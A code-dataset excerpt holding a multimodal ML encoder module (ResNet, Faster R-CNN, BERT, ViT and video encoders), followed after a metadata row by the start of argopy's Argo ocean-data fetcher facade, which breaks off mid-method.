        super().__init__()
        encoder_type = config.type
        if isinstance(encoder_type, ImageFeatureEncoderTypes):
            encoder_type = encoder_type.value
        assert (
            "in_dim" in config.params
        ), "ImageFeatureEncoder require 'in_dim' param in config"
        params = config.params
        if encoder_type == "default" or encoder_type == "identity":
            self.module = Identity()
            self.module.in_dim = params.in_dim
            self.module.out_dim = params.in_dim
        elif encoder_type == "projection":
            # Default the projection module to a plain linear layer.
            if "module" not in params:
                params = deepcopy(params)
                params.module = "linear"
            self.module = ProjectionEmbedding(**params)
        elif encoder_type == "finetune_faster_rcnn_fpn_fc7":
            self.module = FinetuneFasterRcnnFpnFc7(params)
        else:
            raise NotImplementedError("Unknown Image Encoder: %s" % encoder_type)
        self.out_dim = self.module.out_dim

    def forward(self, *args, **kwargs):
        return self.module(*args, **kwargs)
@registry.register_encoder("finetune_faster_rcnn_fpn_fc7")
class FinetuneFasterRcnnFpnFc7(ImageFeatureEncoder):
    """Linear fc7 head initialized from Detectron Faster R-CNN weights.

    Loads pickled numpy weight/bias files (downloading the pretrained VMB
    weights if neither file exists) into a single ``nn.Linear`` layer.
    """

    @dataclass
    class Config(ImageFeatureEncoder.Config):
        name: str = "finetune_faster_rcnn_fpn_fc7"
        in_dim: int = MISSING
        weights_file: str = "fc7_w.pkl"
        bias_file: str = "fc7_b.pkl"
        model_data_dir: str = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        model_data_dir = get_absolute_path(config.model_data_dir)
        # Bug fix: absolute config paths previously left the locals
        # weights_file/bias_file unassigned, raising UnboundLocalError at the
        # existence check below. Initialize from config first.
        weights_file = config.weights_file
        if not os.path.isabs(weights_file):
            weights_file = os.path.join(model_data_dir, weights_file)
        bias_file = config.bias_file
        if not os.path.isabs(bias_file):
            bias_file = os.path.join(model_data_dir, bias_file)
        if not PathManager.exists(bias_file) or not PathManager.exists(weights_file):
            # Fall back to the downloadable pretrained weights.
            download_path = download_pretrained_model("detectron.vmb_weights")
            weights_file = get_absolute_path(os.path.join(download_path, "fc7_w.pkl"))
            bias_file = get_absolute_path(os.path.join(download_path, "fc7_b.pkl"))
        with PathManager.open(weights_file, "rb") as w:
            weights = pickle.load(w)
        with PathManager.open(bias_file, "rb") as b:
            bias = pickle.load(b)
        out_dim = bias.shape[0]
        self.lc = nn.Linear(config.in_dim, out_dim)
        self.lc.weight.data.copy_(torch.from_numpy(weights))
        self.lc.bias.data.copy_(torch.from_numpy(bias))
        self.out_dim = out_dim

    def _load_from_state_dict(
        self,
        state_dict,
        prefix,
        local_metadata,
        strict,
        missing_keys,
        unexpected_keys,
        error_msgs,
    ):
        """Remap checkpoint keys saved with an extra ``module.`` prefix."""
        old_prefix = prefix + "module."
        # Snapshot keys with list() because the dict is mutated in place.
        for k in list(state_dict.keys()):
            if k.startswith(old_prefix):
                new_k = k.replace(old_prefix, prefix)
                state_dict[new_k] = state_dict.pop(k)
        super()._load_from_state_dict(
            state_dict,
            prefix,
            local_metadata,
            strict,
            missing_keys,
            unexpected_keys,
            error_msgs,
        )

    def forward(self, image):
        """Project image features through the fc7 layer and apply ReLU."""
        i2 = self.lc(image)
        i3 = nn.functional.relu(i2)
        return i3
@registry.register_encoder("identity")
class IdentityEncoder(Encoder):
    """Pass-through encoder: returns its input unchanged."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "identity"
        # Arbitrary default width used when the config does not specify one.
        in_dim: int = 100

    def __init__(self, config: Config):
        super().__init__()
        self.module = nn.Identity()
        # Identity mapping, so output width equals input width.
        self.in_dim = config.get("in_dim", 100)
        self.out_dim = self.in_dim

    def forward(self, x):
        return self.module(x)
class ImageEncoderTypes(Enum):
    """Valid values for ``ImageEncoderFactory.Config.type``."""

    default = "default"
    identity = "identity"
    torchvision_resnet = "torchvision_resnet"
    resnet152 = "resnet152"
    detectron2_resnet = "detectron2_resnet"
class ImageEncoderFactory(EncoderFactory):
    """Builds the concrete image encoder named by ``config.type``."""

    @dataclass
    class Config(EncoderFactory.Config):
        type: ImageEncoderTypes = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self._type = config.type
        if isinstance(self._type, ImageEncoderTypes):
            self._type = self._type.value
        params = config.params
        if self._type == "default" or self._type == "identity":
            # Features are consumed as-is; only record their width.
            self.module = nn.Identity()
            self.module.out_dim = params.in_dim
        elif self._type == "resnet152":
            self.module = ResNet152ImageEncoder(params)
        elif self._type == "torchvision_resnet":
            self.module = TorchvisionResNetImageEncoder(params)
        elif self._type == "detectron2_resnet":
            self.module = Detectron2ResnetImageEncoder(params)
        elif self._type == "frcnn":
            self.module = FRCNNImageEncoder(params)
        else:
            raise NotImplementedError("Unknown Image Encoder: %s" % self._type)

    @property
    def out_dim(self):
        """Width of the features produced by the wrapped encoder."""
        return self.module.out_dim

    def forward(self, image):
        return self.module(image)
@registry.register_encoder("resnet152")
class ResNet152ImageEncoder(Encoder):
    """ResNet-152 trunk that pools conv features into N 2048-d vectors.

    Output shape is B x num_output_features x 2048 (or the raw
    B x 2048 x 7 x 7 map flattened when num_output_features == -1).
    """

    @dataclass
    class Config(Encoder.Config):
        name: str = "resnet152"
        pretrained: bool = True
        # "avg" or "adaptive"
        pool_type: str = "avg"
        num_output_features: int = 1

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        model = torchvision.models.resnet152(pretrained=config.get("pretrained", True))
        # Drop the final avgpool + fc so the Bx2048x7x7 feature map is kept.
        modules = list(model.children())[:-2]
        self.model = nn.Sequential(*modules)
        pool_func = (
            nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
        )
        # num_output_features -> adaptive pool output size (rows, cols).
        pool_sizes = {
            1: (1, 1),
            2: (2, 1),
            3: (3, 1),
            4: (2, 2),
            5: (5, 1),
            6: (3, 2),
            7: (7, 1),
            8: (4, 2),
            9: (3, 3),
        }
        n = config.num_output_features
        if n == -1:
            # -1 keeps the original feature size.
            self.pool = nn.Identity()
        elif n in pool_sizes:
            self.pool = pool_func(pool_sizes[n])
        else:
            # Previously an unsupported value silently left self.pool unset
            # and only failed later inside forward(); fail fast instead.
            raise ValueError(
                f"Unsupported num_output_features: {n}. Expected -1 or 1..9."
            )
        self.out_dim = 2048

    def forward(self, x):
        # Bx3x224x224 -> Bx2048x7x7 -> Bx2048xN -> BxNx2048
        out = self.pool(self.model(x))
        out = torch.flatten(out, start_dim=2)
        out = out.transpose(1, 2).contiguous()
        return out
@registry.register_encoder("torchvision_resnet")
class TorchvisionResNetImageEncoder(Encoder):
    """Generic torchvision ResNet trunk with configurable output pooling.

    Weights come from torchvision ("supervised"), a local file path, or a
    PathManager URI via ``pretrained_model``. The legacy ``use_avgpool``
    flag is honored for backward compatibility with older configs.
    """

    @dataclass
    class Config(Encoder.Config):
        name: str = "resnet50"
        pretrained: bool = False
        zero_init_residual: bool = True
        num_output_features: int = -1
        pool_type: str = "avg"

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        model = getattr(torchvision.models, config.name)(
            pretrained=config.pretrained, zero_init_residual=config.zero_init_residual
        )
        # Honor the legacy use_avgpool flag by rewriting the new options.
        self.use_avgpool = config.get("use_avgpool", None)
        if self.use_avgpool:
            config.num_output_features = 1
            config.pool_type = "avg"
        elif self.use_avgpool is False:
            config.num_output_features = -1
        if config.pretrained:
            model = self._load_pretrained(model, config)
        # Drop the final avgpool + fc; keep the convolutional trunk.
        modules = list(model.children())[:-2]
        self.model = nn.Sequential(*modules)
        self.pool = self._pool_func(config)
        self.out_dim = config.get("out_dim", 2048)

    def _load_pretrained(self, model, config: Config):
        """Load weights from torchvision, a local file, or a PathManager URI."""
        pretrained_model = config.get("pretrained_model", "supervised")
        if pretrained_model == "supervised":
            pass  # already loaded by torchvision via pretrained=True
        elif os.path.exists(pretrained_model):
            model.load_state_dict(torch.load(pretrained_model))
        else:
            try:
                with PathManager.open(pretrained_model, "rb") as f:
                    model.load_state_dict(
                        torch.load(f, map_location=lambda storage, loc: storage),
                        strict=False,
                    )
            except Exception:
                raise Exception(f"unknown pretrained ResNet model: {pretrained_model}")
        return model

    def _pool_func(self, config: Config):
        """Return the pooling layer implied by ``config.num_output_features``."""
        pool_func = (
            nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
        )
        n = config.num_output_features
        # -1 keeps the original feature size.
        if n == -1:
            return nn.Identity()
        # num_output_features -> adaptive pool output size (rows, cols).
        pool_sizes = {
            1: (1, 1),
            2: (2, 1),
            3: (3, 1),
            4: (2, 2),
            5: (5, 1),
            6: (3, 2),
            7: (7, 1),
            8: (4, 2),
            9: (3, 3),
        }
        if n not in pool_sizes:
            # Previously an unsupported value fell through and raised a
            # confusing UnboundLocalError; fail fast with a clear message.
            raise ValueError(
                f"Unsupported num_output_features: {n}. Expected -1 or 1..9."
            )
        return pool_func(pool_sizes[n])

    def forward(self, x):
        # B x 3 x 224 x 224 -> B x out_dim x 7 x 7
        out = self.pool(self.model(x))
        if self.use_avgpool is None:
            out = torch.flatten(out, start_dim=2)
            out = out.transpose(1, 2).contiguous()  # B x N x out_dim
        else:
            out = torch.flatten(out, start_dim=1)  # B x N*out_dim
        return out
@registry.register_encoder("detectron2_resnet")
class Detectron2ResnetImageEncoder(Encoder):
    """ResNet backbone built via detectron2; forward returns the ``res5`` map."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "detectron2_resnet"
        pretrained: bool = True
        # URL of a detectron2 checkpoint; required when pretrained is True.
        pretrained_path: str = None

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        pretrained = config.get("pretrained", False)
        pretrained_path = config.get("pretrained_path", None)
        self.resnet = build_resnet_backbone(config, ShapeSpec(channels=3))
        if pretrained:
            state_dict = torch.hub.load_state_dict_from_url(
                pretrained_path, progress=False
            )
            new_state_dict = OrderedDict()
            replace_layer = {"backbone.": ""}
            # Checkpoint keys carry a "backbone." prefix; strip it so they
            # line up with this bare backbone module.
            for key, value in state_dict["model"].items():
                new_key = re.sub(
                    r"(backbone\.)", lambda x: replace_layer[x.groups()[0]], key
                )
                new_state_dict[new_key] = value
            self.resnet.load_state_dict(new_state_dict, strict=False)
        # NOTE(review): assumes the final stage emits 2048 channels (true for
        # ResNet-50/101/152 style backbones) — confirm for other configs.
        self.out_dim = 2048

    def forward(self, x):
        x = self.resnet(x)
        return x["res5"]
@registry.register_encoder("frcnn")
class FRCNNImageEncoder(Encoder):
    """Faster R-CNN feature extractor; always run in eval mode."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "frcnn"
        pretrained: bool = True
        # Path to a checkpoint loadable by torch.load; required if pretrained.
        pretrained_path: str = None

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        pretrained = config.get("pretrained", False)
        pretrained_path = config.get("pretrained_path", None)
        self.frcnn = GeneralizedRCNN(config)
        if pretrained:
            state_dict = torch.load(pretrained_path)
            self.frcnn.load_state_dict(state_dict)
            # Frozen feature extractor: inference only, no finetuning here.
            self.frcnn.eval()

    def forward(
        self,
        x: torch.Tensor,
        sizes: torch.Tensor = None,
        scales_yx: torch.Tensor = None,
        padding: torch.Tensor = None,
        max_detections: int = 0,
        return_tensors: str = "pt",
    ):
        # All detection arguments are forwarded untouched to GeneralizedRCNN.
        x = self.frcnn(
            x,
            sizes,
            scales_yx=scales_yx,
            padding=padding,
            max_detections=max_detections,
            return_tensors=return_tensors,
        )
        return x
class TextEncoderTypes(Enum):
    """Valid values for ``TextEncoderFactory.Config.type``."""

    identity = "identity"
    transformer = "transformer"
    embedding = "embedding"
class TextEncoderFactory(EncoderFactory):
    """Builds the concrete text encoder named by ``config.type``."""

    @dataclass
    class Config(EncoderFactory.Config):
        type: TextEncoderTypes = MISSING
        params: Encoder.Config = MISSING

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self._type = config.type
        if isinstance(self._type, TextEncoderTypes):
            self._type = self._type.value
        if self._type == "identity":
            self.module = nn.Identity()
        elif self._type == "transformer":
            # Keep the wrapper alive on self._module, but expose the raw
            # HuggingFace model as self.module so callers get its outputs.
            self._module = TransformerEncoder(config.params)
            self.module = self._module.module
        elif self._type == "embedding":
            self.module = TextEmbeddingEncoder(config.params)
        else:
            raise NotImplementedError(f"Unknown Text Encoder {self._type}")

    def forward(self, *args, **kwargs):
        return self.module(*args, **kwargs)
@registry.register_encoder("text_embedding")
class TextEmbeddingEncoder(Encoder):
    """Embeds tokens and reduces them along the sequence axis."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "text_embedding"
        # One of "sum", "concat", "mul"; anything else leaves the raw embedding.
        operator: str = MISSING
        # Kept as Any pending a separate refactor.
        embedding_params: Any = MISSING

    def __init__(self, config: Config):
        super().__init__()
        self._operator = config.operator
        self._embedding_params = config.embedding_params
        self.module = TextEmbedding(
            self._embedding_params.type, **self._embedding_params.params
        )

    def forward(self, x):
        x = self.module(x)
        if self._operator == "sum":
            x = x.sum(dim=1)
        elif self._operator == "concat":
            x = torch.cat(x, dim=1)
        elif self._operator == "mul":
            x = torch.prod(x, dim=1)
        # Squeeze out any remaining size-1 dimensions.
        return x.squeeze()
@registry.register_encoder("transformer")
class TransformerEncoder(Encoder):
    """HuggingFace transformer encoder (BERT via a TorchScript-friendly Jit
    variant, anything else via AutoModel), with optional extra segment
    embeddings."""

    @dataclass
    class Config(Encoder.Config):
        name: str = "transformer"
        num_segments: int = 2
        bert_model_name: str = "bert-base-uncased"
        # Options below override the HF config used to initialize the encoder:
        # vocab_size: x to update the size of the vocabulary with which encoder is
        # initialized. If you update the default values, the transformer you
        # will get will be initialized from scratch.
        hidden_size: int = 768
        num_hidden_layers: int = 12
        num_attention_heads: int = 12
        output_attentions: bool = False
        output_hidden_states: bool = False
        random_init: bool = False

    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        hf_params = {"config": self._build_encoder_config(config)}
        should_random_init = self.config.get("random_init", False)
        # For BERT models, initialize using Jit version
        if self.config.bert_model_name.startswith("bert-"):
            if should_random_init:
                self.module = BertModelJit(**hf_params)
            else:
                self.module = BertModelJit.from_pretrained(
                    self.config.bert_model_name, **hf_params
                )
        else:
            if should_random_init:
                self.module = AutoModel.from_config(**hf_params)
            else:
                self.module = AutoModel.from_pretrained(
                    self.config.bert_model_name, **hf_params
                )
        self.embeddings = self.module.embeddings
        # After construction, self.config becomes the HF model config; the
        # original MMF config is preserved on self.original_config.
        self.original_config = self.config
        self.config = self.module.config
        self._init_segment_embeddings()

    def _init_segment_embeddings(self):
        """Grow token-type embeddings to ``num_segments`` entries; extra rows
        are initialized to the mean of the pretrained rows."""
        if self.original_config.get("num_segments", None):
            num_segments = self.original_config.num_segments
            if hasattr(self.embeddings, "token_type_embeddings"):
                new_embeds = nn.Embedding(num_segments, self.config.hidden_size)
                new_embeds.weight.data[:2].copy_(
                    self.embeddings.token_type_embeddings.weight
                )
                for idx in range(2, num_segments - 1):
                    new_embeds.weight.data[idx].copy_(
                        self.embeddings.token_type_embeddings.weight.data.mean(dim=0)
                    )
                self.embeddings.token_type_embeddings = new_embeds

    def _build_encoder_config(self, config: Config):
        # All keys of the MMF config are passed through as HF config overrides.
        return AutoConfig.from_pretrained(
            config.bert_model_name, **OmegaConf.to_container(config)
        )

    def forward(self, *args, return_sequence=False, **kwargs) -> Tensor:
        # Only return pooled output
        output = self.module(*args, **kwargs)
        return output[0] if return_sequence else output[1]
class MultiModalEncoderBase(Encoder):
    """Base class bundling a text encoder and a modal (image / image-feature)
    encoder, both built from a single config."""
    __jit_unused_properties__ = ["encoder_config"]
    @dataclass
    class Config(Encoder.Config):
        # This actually is Union[ImageEncoderConfig, ImageFeatureEncoderConfig]
        modal_encoder: EncoderFactory.Config = ImageEncoderFactory.Config(
            type=ImageEncoderTypes.resnet152, params=ResNet152ImageEncoder.Config()
        )
        text_encoder: EncoderFactory.Config = TextEncoderFactory.Config(
            type=TextEncoderTypes.transformer, params=TransformerEncoder.Config()
        )
        # When True, the modal branch consumes precomputed features.
        direct_features_input: bool = False
        modal_hidden_size: int = 2048
        text_hidden_size: int = 768
    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        self._modal_encoder_config = self.config.get("modal_encoder", None)
        self._is_direct_features_input = self.config.get("direct_features_input", False)
        self.build()
        self.modal_hidden_size = self.config.get("modal_hidden_size", None)
        self.text_hidden_size = self.config.get("text_hidden_size", None)
    def build(self):
        encoders = self._build_encoders(self.config)
        self.text_encoder, self.modal_encoder = encoders[0], encoders[1]
        # Expose the text encoder's config (if any) for downstream consumers.
        self._encoder_config = None
        if self.text_encoder:
            self._encoder_config = self.text_encoder.config
    @property
    def encoder_config(self):
        return self._encoder_config
    def _build_encoders(self, config):
        # Either encoder may be omitted from the config; build what exists.
        text_encoder = None
        if config.get("text_encoder", None):
            text_encoder = build_text_encoder(config.text_encoder)
        modal_encoder = None
        if config.get("modal_encoder", None):
            modal_encoder = self._build_modal_encoder(config.modal_encoder)
        return (text_encoder, modal_encoder)
    def _build_modal_encoder(self, config):
        return build_image_encoder(
            config, direct_features=self._is_direct_features_input
        )
class PooledEncoder(Encoder):
    """Base encoder that runs a backbone (from ``build_encoder``) and
    adaptively pools its output to a fixed number of feature vectors."""
    @dataclass
    class Config(Encoder.Config):
        num_output_features: int = 1  # How many output features need to be returned.
        pool_type: str = "avg"  # type of pooling to apply "avg" | "adaptive"
        out_dim: int = MISSING  # size of out dim expected
        three_d: bool = False  # if input requires 3D pooling (for video)
    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.encoder = self.build_encoder(config)
        pool_func = (
            nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
        )
        params = (config.num_output_features, 1)
        if config.three_d:
            # Video inputs pool over an extra (temporal) dimension.
            pool_func = (
                nn.AdaptiveAvgPool3d
                if config.pool_type == "avg"
                else nn.AdaptiveMaxPool3d
            )
            params = (config.num_output_features, 1, 1)
        # -1 will keep the original feature size
        if config.num_output_features == -1:
            self.pool = nn.Identity()
        else:
            self.pool = pool_func(params)
        self.out_dim = config.out_dim
    def build_encoder(self, config: Config, *args, **kwargs):
        # Subclasses must return the backbone nn.Module.
        raise NotImplementedError()
    def forward(self, x: Tensor) -> Tensor:
        out = self.encoder(x)
        out = self.pool(out)
        # Flatten pooled dims and move channels last: (B, N, C).
        out = torch.flatten(out, start_dim=2)
        out = out.transpose(1, 2).contiguous()
        return out
@registry.register_encoder("pytorchvideo")
class PytorchVideoEncoder(Encoder):
    """Wraps a model from the pytorchvideo TorchHub repo, optionally dropping
    its last layers and appending a pooler from the registry."""
    @dataclass
    class Config(Encoder.Config):
        name: str = "pytorchvideo"
        random_init: bool = False
        model_name: str = "slowfast_r50"
        # Number of trailing layers to drop (negative slice); 0 keeps all.
        drop_last_n_layers: int = -1
        pooler_name: str = "identity"
    PYTORCHVIDEO_REPO = "facebookresearch/pytorchvideo:main"
    def __init__(self, config: Config):
        super().__init__()
        # Merge the user config over the dataclass defaults.
        config = OmegaConf.create({**asdict(self.Config()), **config})
        if config.random_init:
            params = dict(**OmegaConf.to_container(config))
            # Keys that are not part of our own Config are forwarded to the
            # model constructor.
            params = {
                k: v
                for k, v in params.items()
                if k not in PytorchVideoEncoder.Config().__dict__
            }
            try:
                model = torch.hub.load(
                    PytorchVideoEncoder.PYTORCHVIDEO_REPO,
                    model=config.model_name,
                    pretrained=False,
                    **params,
                )
            except BaseException as err:
                # Fall back to a locally installed pytorchvideo when hub
                # access fails; re-raise if it is not installed at all.
                pytorchvideo_spec = importlib.util.find_spec("pytorchvideo")
                if pytorchvideo_spec is None:
                    raise err
                import pytorchvideo.models.hub as hub
                model_create_fn = getattr(hub, config.model_name)
                model = model_create_fn(pretrained=False, **params)
        else:
            # load weights from TorchHub
            model = torch.hub.load(
                PytorchVideoEncoder.PYTORCHVIDEO_REPO,
                model=config.model_name,
                pretrained=True,
            )
        encoder_list = []
        if config.drop_last_n_layers == 0:
            encoder_list += [model]
        else:
            modules_list = list(model.children())
            if len(modules_list) == 1:
                # Unwrap a single top-level container before slicing layers.
                modules_list = list(modules_list[0].children())
            modules = modules_list[: config.drop_last_n_layers]
            encoder_list += modules
        pooler = registry.get_pool_class(config.pooler_name)()
        encoder_list += [pooler]
        self.encoder = nn.Sequential(*encoder_list)
    def forward(self, *args, **kwargs):
        # pass along input to model
        # assumes caller obeys the dynamic model signature
        return self.encoder(*args, **kwargs)
@registry.register_encoder("r2plus1d_18")
class R2Plus1D18VideoEncoder(PooledEncoder):
    """R(2+1)D-18 video backbone from torchvision, pooled per PooledEncoder."""
    @dataclass
    class Config(PooledEncoder.Config):
        name: str = "r2plus1d_18"
        out_dim: int = 512  # out dim
        pretrained: bool = True  # if should use pretrained version or not
        three_d: bool = True
    def build_encoder(self, config: Config, *args, **kwargs):
        model = torchvision.models.video.r2plus1d_18(
            pretrained=config.get("pretrained", True)
        )
        # Drop the last two children (pooling/classification head) and keep
        # the convolutional trunk.
        modules = list(model.children())[:-2]
        return nn.Sequential(*modules)
@registry.register_encoder("resnet18_audio")
class ResNet18AudioEncoder(PooledEncoder):
    """ResNet-18 adapted for single-channel (e.g. spectrogram) audio input."""
    @dataclass
    class Config(PooledEncoder.Config):
        name: str = "resnet18_audio"
        out_dim: int = 512
        pretrained: bool = False
    def build_encoder(self, config: Config, *args, **kwargs):
        model = torchvision.models.resnet18(pretrained=config.get("pretrained", False))
        # Replace the stem conv to accept 1 input channel instead of 3.
        model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
        # Drop the last two children (avgpool + fc head).
        modules = list(model.children())[:-2]
        return nn.Sequential(*modules)
@registry.register_encoder("vit")
class ViTEncoder(Encoder):
    """Vision Transformer encoder backed by the project's ViTModel wrapper."""
    @dataclass
    class Config(Encoder.Config):
        name: str = "vit"
        # See https://huggingface.co/models?filter=vit for available options
        pretrained_model_name: str = "google/vit-base-patch16-224"
        random_init: bool = False
        gradient_checkpointing: bool = False
    def __init__(self, config: Config, *args, **kwargs):
        super().__init__()
        self.config = config
        self.module, self.hf_config = self._model_class.from_config(config)
        self.embeddings = self.module.embeddings
        self.out_dim = self.hf_config.hidden_size
    @property
    def _model_class(self):
        # Imported lazily to avoid a hard import dependency at module load.
        from mmf.modules.vit import ViTModel
        return ViTModel
    def forward(self, *args, **kwargs):
        if "output_hidden_states" not in kwargs:
            kwargs["output_hidden_states"] = False
        output = self.module(*args, **kwargs)
        # Returns (last_hidden_state, hidden_states-or-None).
        return output["last_hidden_state"], output.get("hidden_states", None)
| true | true |
f725fbcb3a31eaf8eff4449388e052cf673f2915 | 15,435 | py | Python | argopy/fetchers.py | dhruvbalwada/argopy | 66a0b38ab5024d2ff2b7055e0e9b1c62837023a1 | [
"Apache-2.0"
] | null | null | null | argopy/fetchers.py | dhruvbalwada/argopy | 66a0b38ab5024d2ff2b7055e0e9b1c62837023a1 | [
"Apache-2.0"
] | null | null | null | argopy/fetchers.py | dhruvbalwada/argopy | 66a0b38ab5024d2ff2b7055e0e9b1c62837023a1 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python
# -*coding: UTF-8 -*-
"""
High level helper methods to load Argo data from any source
The facade should be able to work with all available data access point,
"""
import warnings
from argopy.options import OPTIONS, _VALIDATORS
from .errors import InvalidFetcherAccessPoint, InvalidFetcher
from .utilities import list_available_data_src, list_available_index_src
from .plotters import plot_trajectory, plot_dac, plot_profilerType
# Registries of data/index fetcher backends, discovered once at import time.
AVAILABLE_DATA_SOURCES = list_available_data_src()
AVAILABLE_INDEX_SOURCES = list_available_index_src()
class ArgoDataFetcher(object):
    """ Fetch and process Argo data.

    Can return data selected from:
    - one or more float(s), defined by WMOs
    - one or more profile(s), defined for one WMO and one or more CYCLE NUMBER
    - a space/time rectangular domain, defined by lat/lon/pres/time range

    Can return data from the regular Argo dataset ('phy': temperature, salinity)
    and the Argo referenced dataset used in DMQC ('ref': temperature, salinity).

    This is the main API facade.
    Specify here all options to data_fetchers.
    """
    def __init__(self,
                 mode: str = "",
                 src: str = "",
                 ds: str = "",
                 **fetcher_kwargs):
        """
        Parameters
        ----------
        mode : str
            User mode. Set to OPTIONS['mode'] by default.
        ds : str
            Name of the dataset to load. Use the global OPTIONS['dataset'] by default.
        src : str
            Source of the data to use. Use the global OPTIONS['src'] by default.
        **fetcher_kwargs
            Used to pass arguments specific to a data source.

        Raises
        ------
        InvalidFetcher
            If the requested data source is not available.
        """
        # Facade options; global OPTIONS are the fallback for empty values:
        self._mode = OPTIONS['mode'] if mode == '' else mode
        self._dataset_id = OPTIONS['dataset'] if ds == '' else ds
        self._src = OPTIONS['src'] if src == '' else src
        _VALIDATORS['mode'](self._mode)
        _VALIDATORS['src'](self._src)
        _VALIDATORS['dataset'](self._dataset_id)
        # Load data source access points:
        if self._src not in AVAILABLE_DATA_SOURCES:
            raise InvalidFetcher("Requested data fetcher '%s' not available ! Please try again with any of: %s"
                                 % (self._src, "\n".join(AVAILABLE_DATA_SOURCES)))
        Fetchers = AVAILABLE_DATA_SOURCES[self._src]
        # Auto-discovery of access points for this fetcher:
        # rq: Access point names for the facade are not the same as the access point of fetchers
        self.valid_access_points = ['profile', 'float', 'region']
        self.Fetchers = {}
        for p in Fetchers.access_points:
            if p == 'wmo':  # Required for 'profile' and 'float'
                self.Fetchers['profile'] = Fetchers.Fetch_wmo
                self.Fetchers['float'] = Fetchers.Fetch_wmo
            if p == 'box':  # Required for 'region'
                self.Fetchers['region'] = Fetchers.Fetch_box
        # Init sub-methods:
        self.fetcher = None
        if ds is None:
            ds = Fetchers.dataset_ids[0]
        self.fetcher_options = {**{'ds': ds}, **fetcher_kwargs}
        self.postproccessor = self.__empty_processor
        self._AccessPoint = None
        # Dev warnings
        # Todo Clean-up before each release
        if self._dataset_id == 'bgc' and self._mode == 'standard':
            warnings.warn(" 'BGC' dataset fetching in 'standard' user mode is not reliable. "
                          "Try to switch to 'expert' mode if you encounter errors.")
    def __repr__(self):
        if self.fetcher:
            summary = [self.fetcher.__repr__()]
            summary.append("Backend: %s" % self._src)
            summary.append("User mode: %s" % self._mode)
        else:
            summary = ["<datafetcher 'Not initialised'>"]
            summary.append("Backend: %s" % self._src)
            summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
            summary.append("User mode: %s" % self._mode)
        return "\n".join(summary)
    def __empty_processor(self, xds):
        """ Do nothing to a dataset """
        return xds
    def __getattr__(self, key):
        """ Validate access points """
        # Only reached for attributes NOT found through normal lookup, so
        # typos fail loudly instead of silently returning None.
        valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
        if key not in self.valid_access_points and key not in valid_attrs:
            raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
        pass
    def _register_standard_postprocessing(self):
        """ Install the 'standard' user-mode filtering chain, if applicable.

        Shared by the 'float', 'profile' and 'region' access points so the
        data-mode/QC/variable filtering is defined in exactly one place
        (previously duplicated verbatim in all three methods).
        """
        if self._mode == 'standard' and self._dataset_id != 'ref':
            def postprocessing(xds):
                xds = self.fetcher.filter_data_mode(xds)
                xds = self.fetcher.filter_qc(xds)
                xds = self.fetcher.filter_variables(xds, self._mode)
                return xds
            self.postproccessor = postprocessing
    def dashboard(self, **kw):
        """ Open the data dashboard for the current access point, if supported """
        try:
            return self.fetcher.dashboard(**kw)
        except Exception:
            # Typo fix in the user-facing message: 'avaible' -> 'available'.
            warnings.warn("dashboard not available for this fetcher access point (%s/%s)"
                          % (self._src, self._AccessPoint))
    def float(self, wmo, **kw):
        """ Fetch data for one or more floats, given their WMO numbers """
        if "CYC" in kw or "cyc" in kw:
            raise TypeError("float() got an unexpected keyword argument 'cyc'. Use 'profile' access "
                            "point to fetch specific profile data.")
        if 'float' in self.Fetchers:
            self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
            self._AccessPoint = 'float'  # Register the requested access point
        else:
            raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
        self._register_standard_postprocessing()
        return self
    def profile(self, wmo, cyc):
        """ Fetch data from a profile
            given one or more WMOs and CYCLE_NUMBER
        """
        if 'profile' in self.Fetchers:
            self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
            self._AccessPoint = 'profile'  # Register the requested access point
        else:
            raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
        self._register_standard_postprocessing()
        return self
    def region(self, box: list):
        """ Fetch data from a space/time domain

        Parameters
        ----------
        box: list(lon_min: float, lon_max: float, lat_min: float, lat_max: float, pres_min: float, pres_max: float,
        date_min: str, date_max: str)
            Define the domain to load all Argo data for. Longitude, latitude and pressure bounds are required, while
            the two bounding dates [date_min and date_max] are optional. If not specified, the entire time series
            is requested.

        Returns
        -------
        :class:`argopy.DataFetcher` with an access point initialized.
        """
        if 'region' in self.Fetchers:
            self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
            self._AccessPoint = 'region'  # Register the requested access point
        else:
            raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
        self._register_standard_postprocessing()
        return self
    def to_xarray(self, **kwargs):
        """ Fetch and return data as a post-processed xarray.Dataset

        Returns
        -------
        :class:`xarray.Dataset`
        """
        if self._AccessPoint not in self.valid_access_points:
            raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
        xds = self.fetcher.to_xarray(**kwargs)
        xds = self.postproccessor(xds)
        return xds
    def to_dataframe(self, **kwargs):
        """ Fetch and return data as pandas.Dataframe """
        if self._AccessPoint not in self.valid_access_points:
